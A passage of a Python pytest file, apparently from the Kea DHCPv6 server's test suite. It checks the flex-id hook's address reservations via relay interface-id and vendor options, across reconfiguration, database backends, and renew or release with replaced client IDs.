srv_msg.response_check_option_content(9, 'Relayed', 'Message')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(2)
srv_msg.response_check_include_option(3)
srv_msg.response_check_option_content(3, 'sub-option', 5)
# Relayed Message sub-option 5 from option 3 MUST contain address 2001:db8:1::1.
srv_msg.response_check_suboption_content(5, 3, 'addr', '3000::f')
misc.test_setup()
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
srv_control.host_reservation_in_subnet('hostname',
'reserved-hostname',
0,
'flex-id',
'\'port1234\'')
srv_control.host_reservation_in_subnet_add_value(0, 0, 'ip-address', '3000::f')
srv_control.add_line({"host-reservation-identifiers": ["duid", "flex-id"]})
srv_control.add_hooks('libdhcp_flex_id.so')
srv_control.add_parameter_to_hook(1,
'identifier-expression',
'substring(relay6[0].option[18].hex,0,8)')
srv_control.open_control_channel()
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'reconfigured')
misc.test_procedure()
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_does_include('Client', 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
srv_msg.client_sets_value('RelayAgent', 'ifaceid', 'port1234')
srv_msg.client_does_include('RelayAgent', 'interface-id')
srv_msg.create_relay_forward()
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'RELAYREPLY')
srv_msg.response_check_include_option(18)
srv_msg.response_check_include_option(9)
srv_msg.response_check_option_content(9, 'Relayed', 'Message')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(2)
srv_msg.response_check_include_option(3)
srv_msg.response_check_option_content(3, 'sub-option', 5)
# Relayed Message sub-option 5 from option 3 MUST contain address 2001:db8:1::1.
srv_msg.response_check_suboption_content(5, 3, 'addr', '3000::f')
@pytest.mark.v6
@pytest.mark.flexid
@pytest.mark.kea_only
def test_v6_hooks_flexid_reconfigure_2():
misc.test_setup()
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
srv_control.host_reservation_in_subnet('hostname',
'reserved-hostname',
0,
'flex-id',
'\'port1234\'')
srv_control.host_reservation_in_subnet_add_value(0, 0, 'ip-address', '3000::f')
srv_control.add_line({"host-reservation-identifiers": ["duid", "flex-id"]})
srv_control.add_hooks('libdhcp_flex_id.so')
srv_control.add_parameter_to_hook(1,
'identifier-expression',
'substring(relay6[0].option[18].hex,0,8)')
srv_control.open_control_channel()
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_does_include('Client', 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
srv_msg.client_sets_value('RelayAgent', 'ifaceid', 'port1234')
srv_msg.client_does_include('RelayAgent', 'interface-id')
srv_msg.create_relay_forward()
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'RELAYREPLY')
srv_msg.response_check_include_option(18)
srv_msg.response_check_include_option(9)
srv_msg.response_check_option_content(9, 'Relayed', 'Message')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(2)
srv_msg.response_check_include_option(3)
srv_msg.response_check_option_content(3, 'sub-option', 5)
# Relayed Message sub-option 5 from option 3 MUST contain address 2001:db8:1::1.
srv_msg.response_check_suboption_content(5, 3, 'addr', '3000::f')
misc.test_setup()
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
srv_control.host_reservation_in_subnet('hostname',
'reserved-hostname',
0,
'flex-id',
'\'port4321\'')
srv_control.host_reservation_in_subnet_add_value(0, 0, 'ip-address', '3000::f')
srv_control.add_line({"host-reservation-identifiers": ["duid", "flex-id"]})
srv_control.add_hooks('libdhcp_flex_id.so')
srv_control.add_parameter_to_hook(1,
'identifier-expression',
'substring(relay6[0].option[18].hex,0,8)')
srv_control.open_control_channel()
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'reconfigured')
misc.test_procedure()
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_does_include('Client', 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
srv_msg.client_sets_value('RelayAgent', 'ifaceid', 'port1234')
srv_msg.client_does_include('RelayAgent', 'interface-id')
srv_msg.create_relay_forward()
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'RELAYREPLY')
srv_msg.response_check_include_option(18)
srv_msg.response_check_include_option(9)
srv_msg.response_check_option_content(9, 'Relayed', 'Message')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(2)
srv_msg.response_check_include_option(3)
srv_msg.response_check_option_content(3, 'sub-option', 5)
srv_msg.response_check_suboption_content(5, 3, 'addr', '3000::f', expect_include=False)
misc.test_procedure()
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_does_include('Client', 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
srv_msg.client_sets_value('RelayAgent', 'ifaceid', 'port4321')
srv_msg.client_does_include('RelayAgent', 'interface-id')
srv_msg.create_relay_forward()
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'RELAYREPLY')
srv_msg.response_check_include_option(18)
srv_msg.response_check_include_option(9)
srv_msg.response_check_option_content(9, 'Relayed', 'Message')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(2)
srv_msg.response_check_include_option(3)
srv_msg.response_check_option_content(3, 'sub-option', 5)
srv_msg.response_check_suboption_content(5, 3, 'addr', '3000::f')
@pytest.mark.v6
@pytest.mark.flexid
@pytest.mark.kea_only
def test_v6_hooks_flexid_2():
misc.test_setup()
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
srv_control.host_reservation_in_subnet('hostname',
'reserved-hostname',
0,
'flex-id',
'\'port1234\'')
srv_control.host_reservation_in_subnet_add_value(0, 0, 'ip-address', '3000::f')
srv_control.add_line({"host-reservation-identifiers": ["duid", "flex-id"]})
srv_control.add_hooks('libdhcp_flex_id.so')
srv_control.add_parameter_to_hook(1, 'identifier-expression', 'relay6[0].option[18].hex')
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
# Using UNIX socket on server in path control_socket send {"command": "config-reload","arguments": {} }
misc.test_procedure()
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_does_include('Client', 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
srv_msg.client_sets_value('RelayAgent', 'ifaceid', 'port1234')
srv_msg.client_does_include('RelayAgent', 'interface-id')
srv_msg.create_relay_forward()
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'RELAYREPLY')
srv_msg.response_check_include_option(18)
srv_msg.response_check_include_option(9)
srv_msg.response_check_option_content(9, 'Relayed', 'Message')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(2)
srv_msg.response_check_include_option(3)
srv_msg.response_check_option_content(3, 'sub-option', 5)
# Relayed Message sub-option 5 from option 3 MUST contain address 2001:db8:1::1.
srv_msg.response_check_suboption_content(5, 3, 'addr', '3000::f')
@pytest.mark.v6
@pytest.mark.flexid
@pytest.mark.kea_only
def test_v6_hooks_flexid_3():
misc.test_setup()
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
srv_control.host_reservation_in_subnet('hostname',
'reserved-hostname',
0,
'flex-id',
'01:02:03:04:05:06')
srv_control.host_reservation_in_subnet_add_value(0, 0, 'ip-address', '3000::f')
srv_control.add_line({"host-reservation-identifiers": ["duid", "flex-id"]})
srv_control.add_hooks('libdhcp_flex_id.so')
srv_control.add_parameter_to_hook(1,
'identifier-expression',
'vendor[4491].option[1026].hex')
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'enterprisenum', '4491')
srv_msg.client_does_include('Client', 'vendor-class')
srv_msg.add_vendor_suboption('Client', 1026, '01:02:03:04:05:06')
srv_msg.client_does_include('Client', 'vendor-specific-info')
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_does_include('Client', 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ADVERTISE')
srv_msg.response_check_include_option(3)
srv_msg.response_check_option_content(3, 'sub-option', 5)
srv_msg.response_check_suboption_content(5, 3, 'addr', '3000::f')
@pytest.mark.v6
@pytest.mark.flexid
@pytest.mark.kea_only
def test_v6_hooks_flexid_mysql_1():
misc.test_setup()
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
srv_control.add_line({"host-reservation-identifiers": ["flex-id"]})
srv_control.add_hooks('libdhcp_flex_id.so')
srv_control.add_parameter_to_hook(1, 'identifier-expression', 'relay6[0].option[18].hex')
srv_control.enable_db_backend_reservation('MySQL')
srv_control.new_db_backend_reservation('MySQL', 'flex-id', '706f727431323334')
srv_control.update_db_backend_reservation('hostname', 'reserved-hostname', 'MySQL', 1)
srv_control.update_db_backend_reservation('dhcp6_subnet_id', 1, 'MySQL', 1)
srv_control.ipv6_address_db_backend_reservation('3000::f', '$(EMPTY)', 'MySQL', 1)
srv_control.upload_db_reservation('MySQL')
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
# Pause the Test.
misc.test_procedure()
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_does_include('Client', 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
srv_msg.client_sets_value('RelayAgent', 'ifaceid', 'port1234')
srv_msg.client_does_include('RelayAgent', 'interface-id')
srv_msg.create_relay_forward()
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'RELAYREPLY')
srv_msg.response_check_include_option(18)
srv_msg.response_check_include_option(9)
srv_msg.response_check_option_content(9, 'Relayed', 'Message')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(2)
srv_msg.response_check_include_option(3)
srv_msg.response_check_option_content(3, 'sub-option', 5)
srv_msg.response_check_suboption_content(5, 3, 'addr', '3000::f')
@pytest.mark.v6
@pytest.mark.flexid
@pytest.mark.kea_only
def test_v6_hooks_flexid_mysql_2():
misc.test_setup()
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
srv_control.add_line({"host-reservation-identifiers": ["duid", "flex-id"]})
srv_control.add_hooks('libdhcp_flex_id.so')
srv_control.add_parameter_to_hook(1,
'identifier-expression',
'vendor[4491].option[1026].hex')
srv_control.enable_db_backend_reservation('MySQL')
srv_control.new_db_backend_reservation('MySQL', 'flex-id', '01:02:03:04:05:06')
srv_control.update_db_backend_reservation('hostname', 'reserved-hostname', 'MySQL', 1)
srv_control.update_db_backend_reservation('dhcp6_subnet_id', 1, 'MySQL', 1)
srv_control.ipv6_address_db_backend_reservation('3000::f', '$(EMPTY)', 'MySQL', 1)
srv_control.upload_db_reservation('MySQL')
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'enterprisenum', '4491')
srv_msg.client_does_include('Client', 'vendor-class')
srv_msg.add_vendor_suboption('Client', 1026, '01:02:03:04:05:06')
srv_msg.client_does_include('Client', 'vendor-specific-info')
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_does_include('Client', 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ADVERTISE')
srv_msg.response_check_include_option(3)
srv_msg.response_check_option_content(3, 'sub-option', 5)
srv_msg.response_check_suboption_content(5, 3, 'addr', '3000::f')
@pytest.mark.v6
@pytest.mark.flexid
@pytest.mark.kea_only
def test_v6_hooks_flexid_pgsql_1():
misc.test_setup()
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
srv_control.add_line({"host-reservation-identifiers": ["duid", "flex-id"]})
srv_control.add_hooks('libdhcp_flex_id.so')
srv_control.add_parameter_to_hook(1, 'identifier-expression', 'relay6[0].option[18].hex')
srv_control.enable_db_backend_reservation('PostgreSQL')
srv_control.new_db_backend_reservation('PostgreSQL', 'flex-id', '706f727431323334')
srv_control.update_db_backend_reservation('hostname', 'reserved-hostname', 'PostgreSQL', 1)
srv_control.update_db_backend_reservation('dhcp6_subnet_id', 1, 'PostgreSQL', 1)
srv_control.ipv6_address_db_backend_reservation('3000::f', '$(EMPTY)', 'PostgreSQL', 1)
srv_control.upload_db_reservation('PostgreSQL')
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
# Pause the Test.
misc.test_procedure()
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_does_include('Client', 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
srv_msg.client_sets_value('RelayAgent', 'ifaceid', 'port1234')
srv_msg.client_does_include('RelayAgent', 'interface-id')
srv_msg.create_relay_forward()
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'RELAYREPLY')
srv_msg.response_check_include_option(18)
srv_msg.response_check_include_option(9)
srv_msg.response_check_option_content(9, 'Relayed', 'Message')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(2)
srv_msg.response_check_include_option(3)
srv_msg.response_check_option_content(3, 'sub-option', 5)
srv_msg.response_check_suboption_content(5, 3, 'addr', '3000::f')
@pytest.mark.v6
@pytest.mark.flexid
@pytest.mark.kea_only
def test_v6_hooks_flexid_pgsql_2():
misc.test_setup()
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
srv_control.add_line({"host-reservation-identifiers": ["duid", "flex-id"]})
srv_control.add_hooks('libdhcp_flex_id.so')
srv_control.add_parameter_to_hook(1,
'identifier-expression',
'vendor[4491].option[1026].hex')
srv_control.enable_db_backend_reservation('PostgreSQL')
srv_control.new_db_backend_reservation('PostgreSQL', 'flex-id', '01:02:03:04:05:06')
srv_control.update_db_backend_reservation('hostname', 'reserved-hostname', 'PostgreSQL', 1)
srv_control.update_db_backend_reservation('dhcp6_subnet_id', 1, 'PostgreSQL', 1)
srv_control.ipv6_address_db_backend_reservation('3000::f', '$(EMPTY)', 'PostgreSQL', 1)
srv_control.upload_db_reservation('PostgreSQL')
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'enterprisenum', '4491')
srv_msg.client_does_include('Client', 'vendor-class')
srv_msg.add_vendor_suboption('Client', 1026, '01:02:03:04:05:06')
srv_msg.client_does_include('Client', 'vendor-specific-info')
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_does_include('Client', 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ADVERTISE')
srv_msg.response_check_include_option(3)
srv_msg.response_check_option_content(3, 'sub-option', 5)
srv_msg.response_check_suboption_content(5, 3, 'addr', '3000::f')
@pytest.mark.v6
@pytest.mark.flexid
@pytest.mark.kea_only
def test_v6_hooks_flexid_replace_duid():
misc.test_setup()
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
srv_control.host_reservation_in_subnet('hostname',
'reserved-hostname',
0,
'flex-id',
'01:02:03:04:05:06')
srv_control.host_reservation_in_subnet_add_value(0, 0, 'ip-address', '3000::f')
srv_control.add_line({"host-reservation-identifiers": ["duid", "flex-id"]})
srv_control.add_hooks('libdhcp_flex_id.so')
srv_control.add_parameter_to_hook(1,
'identifier-expression',
'vendor[4491].option[1026].hex')
srv_control.add_parameter_to_hook(1, 'replace-client-id', True)
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
srv_msg.client_sets_value('Client', 'enterprisenum', '4491')
srv_msg.client_does_include('Client', 'vendor-class')
srv_msg.add_vendor_suboption('Client', 1026, '01:02:03:04:05:06')
srv_msg.client_does_include('Client', 'vendor-specific-info')
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_does_include('Client', 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ADVERTISE')
srv_msg.response_check_include_option(3)
srv_msg.response_check_option_content(3, 'sub-option', 5)
srv_msg.response_check_suboption_content(5, 3, 'addr', '3000::f')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
srv_msg.client_copy_option('IA_NA')
srv_msg.client_copy_option('server-id')
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_sets_value('Client', 'enterprisenum', '4491')
srv_msg.client_does_include('Client', 'vendor-class')
srv_msg.add_vendor_suboption('Client', 1026, '01:02:03:04:05:06')
srv_msg.client_does_include('Client', 'vendor-specific-info')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'REPLY')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(2)
srv_msg.response_check_include_option(3)
srv_msg.response_check_option_content(3, 'sub-option', 5)
srv_msg.response_check_suboption_content(5, 3, 'addr', '3000::f')
@pytest.mark.v6
@pytest.mark.flexid
@pytest.mark.kea_only
def test_v6_hooks_flexid_replace_duid_renew():
misc.test_setup()
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
srv_control.host_reservation_in_subnet('hostname',
'reserved-hostname',
0,
'flex-id',
'01:02:03:04:05:06')
srv_control.host_reservation_in_subnet_add_value(0, 0, 'ip-address', '3000::f')
srv_control.add_line({"host-reservation-identifiers": ["duid", "flex-id"]})
srv_control.add_hooks('libdhcp_flex_id.so')
srv_control.add_parameter_to_hook(1,
'identifier-expression',
'vendor[4491].option[1026].hex')
srv_control.add_parameter_to_hook(1, 'replace-client-id', True)
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
srv_msg.client_sets_value('Client', 'enterprisenum', '4491')
srv_msg.client_does_include('Client', 'vendor-class')
srv_msg.add_vendor_suboption('Client', 1026, '01:02:03:04:05:06')
srv_msg.client_does_include('Client', 'vendor-specific-info')
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_does_include('Client', 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ADVERTISE')
srv_msg.response_check_include_option(3)
srv_msg.response_check_option_content(3, 'sub-option', 5)
srv_msg.response_check_suboption_content(5, 3, 'addr', '3000::f')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
srv_msg.client_copy_option('IA_NA')
srv_msg.client_copy_option('server-id')
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_sets_value('Client', 'enterprisenum', '4491')
srv_msg.client_does_include('Client', 'vendor-class')
srv_msg.add_vendor_suboption('Client', 1026, '01:02:03:04:05:06')
srv_msg.client_does_include('Client', 'vendor-specific-info')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'REPLY')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(2)
srv_msg.response_check_include_option(3)
srv_msg.response_check_option_content(3, 'sub-option', 5)
srv_msg.response_check_suboption_content(5, 3, 'addr', '3000::f')
# Client with different duid try to renew
misc.test_procedure()
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:ff:ff:ff:ff:ff:01')
srv_msg.client_copy_option('IA_NA')
srv_msg.client_copy_option('server-id')
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_sets_value('Client', 'enterprisenum', '4491')
srv_msg.client_does_include('Client', 'vendor-class')
srv_msg.add_vendor_suboption('Client', 1026, '01:02:03:04:05:06')
srv_msg.client_does_include('Client', 'vendor-specific-info')
srv_msg.client_send_msg('RENEW')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'REPLY')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(2)
srv_msg.response_check_include_option(3)
srv_msg.response_check_option_content(3, 'sub-option', 5)
srv_msg.response_check_suboption_content(5, 3, 'addr', '3000::f')
srv_msg.response_check_suboption_content(5, 3, 'validlft', 0, expect_include=False)
@pytest.mark.v6
@pytest.mark.flexid
@pytest.mark.kea_only
def test_v6_hooks_flexid_replace_duid_renew_failed():
misc.test_setup()
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
srv_control.host_reservation_in_subnet('hostname',
'reserved-hostname',
0,
'flex-id',
'01:02:03:04:05:06')
srv_control.host_reservation_in_subnet_add_value(0, 0, 'ip-address', '3000::f')
srv_control.add_line({"host-reservation-identifiers": ["duid", "flex-id"]})
srv_control.add_hooks('libdhcp_flex_id.so')
srv_control.add_parameter_to_hook(1,
'identifier-expression',
'vendor[4491].option[1026].hex')
srv_control.add_parameter_to_hook(1, 'replace-client-id', True)
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
srv_msg.client_sets_value('Client', 'enterprisenum', '4491')
srv_msg.client_does_include('Client', 'vendor-class')
srv_msg.add_vendor_suboption('Client', 1026, '01:02:03:04:05:06')
srv_msg.client_does_include('Client', 'vendor-specific-info')
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_does_include('Client', 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ADVERTISE')
srv_msg.response_check_include_option(3)
srv_msg.response_check_option_content(3, 'sub-option', 5)
srv_msg.response_check_suboption_content(5, 3, 'addr', '3000::f')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
srv_msg.client_copy_option('IA_NA')
srv_msg.client_copy_option('server-id')
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_sets_value('Client', 'enterprisenum', '4491')
srv_msg.client_does_include('Client', 'vendor-class')
srv_msg.add_vendor_suboption('Client', 1026, '01:02:03:04:05:06')
srv_msg.client_does_include('Client', 'vendor-specific-info')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'REPLY')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(2)
srv_msg.response_check_include_option(3)
srv_msg.response_check_option_content(3, 'sub-option', 5)
srv_msg.response_check_suboption_content(5, 3, 'addr', '3000::f')
# Client with the same DUID and different flex-id try to renew
misc.test_procedure()
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
srv_msg.client_copy_option('IA_NA')
srv_msg.client_copy_option('server-id')
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_sets_value('Client', 'enterprisenum', '4491')
srv_msg.client_does_include('Client', 'vendor-class')
srv_msg.add_vendor_suboption('Client', 1026, '01:02:03:44:55:66')
srv_msg.client_does_include('Client', 'vendor-specific-info')
srv_msg.client_send_msg('RENEW')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'REPLY')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(2)
srv_msg.response_check_include_option(3)
srv_msg.response_check_option_content(3, 'sub-option', 5)
srv_msg.response_check_suboption_content(5, 3, 'addr', '3000::f')
srv_msg.response_check_suboption_content(5, 3, 'validlft', 0)
@pytest.mark.v6
@pytest.mark.flexid
@pytest.mark.kea_only
def test_v6_hooks_flexid_replace_duid_release():
misc.test_setup()
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
srv_control.host_reservation_in_subnet('hostname',
'reserved-hostname',
0,
'flex-id',
'01:02:03:04:05:06')
srv_control.host_reservation_in_subnet_add_value(0, 0, 'ip-address', '3000::f')
srv_control.add_line({"host-reservation-identifiers": ["duid", "flex-id"]})
srv_control.add_hooks('libdhcp_flex_id.so')
srv_control.add_parameter_to_hook(1,
'identifier-expression',
'vendor[4491].option[1026].hex')
srv_control.add_parameter_to_hook(1, 'replace-client-id', True)
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
srv_msg.client_sets_value('Client', 'enterprisenum', '4491')
srv_msg.client_does_include('Client', 'vendor-class')
srv_msg.add_vendor_suboption('Client', 1026, '01:02:03:04:05:06')
srv_msg.client_does_include('Client', 'vendor-specific-info')
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_does_include('Client', 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ADVERTISE')
srv_msg.response_check_include_option(3)
srv_msg.response_check_option_content(3, 'sub-option', 5)
srv_msg.response_check_suboption_content(5, 3, 'addr', '3000::f')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
srv_msg.client_copy_option('IA_NA')
srv_msg.client_copy_option('server-id')
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_sets_value('Client', 'enterprisenum', '4491')
srv_msg.client_does_include('Client', 'vendor-class')
srv_msg.add_vendor_suboption('Client', 1026, '01:02:03:04:05:06')
srv_msg.client_does_include('Client', 'vendor-specific-info')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'REPLY')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(2)
srv_msg.response_check_include_option(3)
srv_msg.response_check_option_content(3, 'sub-option', 5)
srv_msg.response_check_suboption_content(5, 3, 'addr', '3000::f')
# Client with different duid try to release
misc.test_procedure()
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:ff:ff:ff:ff:ff:01')
srv_msg.client_copy_option('IA_NA')
srv_msg.client_copy_option('server-id')
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_sets_value('Client', 'enterprisenum', '4491')
srv_msg.client_does_include('Client', 'vendor-class')
srv_msg.add_vendor_suboption('Client', 1026, '01:02:03:04:05:06')
srv_msg.client_does_include('Client', 'vendor-specific-info')
srv_msg.client_send_msg('RELEASE')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'REPLY')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(2)
srv_msg.response_check_include_option(3)
srv_msg.response_check_option_content(3, 'sub-option', 13)
srv_msg.response_check_suboption_content(13, 3, 'statuscode', 0)
@pytest.mark.v6
@pytest.mark.flexid
@pytest.mark.kea_only
def test_v6_hooks_flexid_replace_duid_release_failed():
misc.test_setup()
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
srv_control.host_reservation_in_subnet('hostname',
'reserved-hostname',
0,
'flex-id',
'01:02:03:04:05:06')
srv_control.host_reservation_in_subnet_add_value(0, 0, 'ip-address', '3000::f')
srv_control.add_line({"host-reservation-identifiers": ["duid", "flex-id"]})
srv_control.add_hooks('libdhcp_flex_id.so')
srv_control.add_parameter_to_hook(1,
'identifier-expression',
'vendor[4491].option[1026].hex')
srv_control.add_parameter_to_hook(1, 'replace-client-id', True)
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
srv_msg.client_sets_value('Client', 'enterprisenum', '4491')
srv_msg.client_does_include('Client', 'vendor-class')
srv_msg.add_vendor_suboption('Client', 1026, '01:02:03:04:05:06')
srv_msg.client_does_include('Client', 'vendor-specific-info')
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_does_include('Client', 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ADVERTISE')
srv_msg.response_check_include_option(3)
srv_msg.response_check_option_content(3, 'sub-option', 5)
srv_msg.response_check_suboption_content(5, 3, 'addr', '3000::f')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
srv_msg.client_copy_option('IA_NA')
srv_msg.client_copy_option('server-id')
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_sets_value('Client', 'enterprisenum', '4491')
srv_msg.client_does_include('Client', 'vendor-class')
srv_msg.add_vendor_suboption('Client', 1026, '01:02:03:04:05:06')
srv_msg.client_does_include('Client', 'vendor-specific-info')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'REPLY')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(2)
srv_msg.response_check_include_option(3)
srv_msg.response_check_option_content(3, 'sub-option', 5)
srv_msg.response_check_suboption_content(5, 3, 'addr', '3000::f')
# Client with the same duid but different flex-id try to release (result should be nobiding)
misc.test_procedure()
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
srv_msg.client_copy_option('IA_NA')
srv_msg.client_copy_option('server-id')
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_sets_value('Client', 'enterprisenum', '4491')
srv_msg.client_does_include('Client', 'vendor-class')
srv_msg.add_vendor_suboption('Client', 1026, '01:02:03:44:55:66')
srv_msg.client_does_include('Client', 'vendor-specific-info')
srv_msg.client_send_msg('RELEASE')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'REPLY')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(2)
srv_msg.response_check_include_option(3)
srv_msg.response_check_option_content(3, 'sub-option', 13)
srv_msg.response_check_suboption_content(13, 3, 'statuscode', 3)
# File stored in kea-leases6.csv MUST contain line or phrase: 3000::f,01:02:03:04:05:06,4000,
# File stored in kea-leases6.csv MUST NOT contain line or phrase: 3000::f,01:02:03:04:05:06,0,
@pytest.mark.v6
@pytest.mark.flexid
@pytest.mark.kea_only
def test_v6_hooks_flexid_replace_duid_release_mysql():
misc.test_setup()
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
srv_control.host_reservation_in_subnet('hostname',
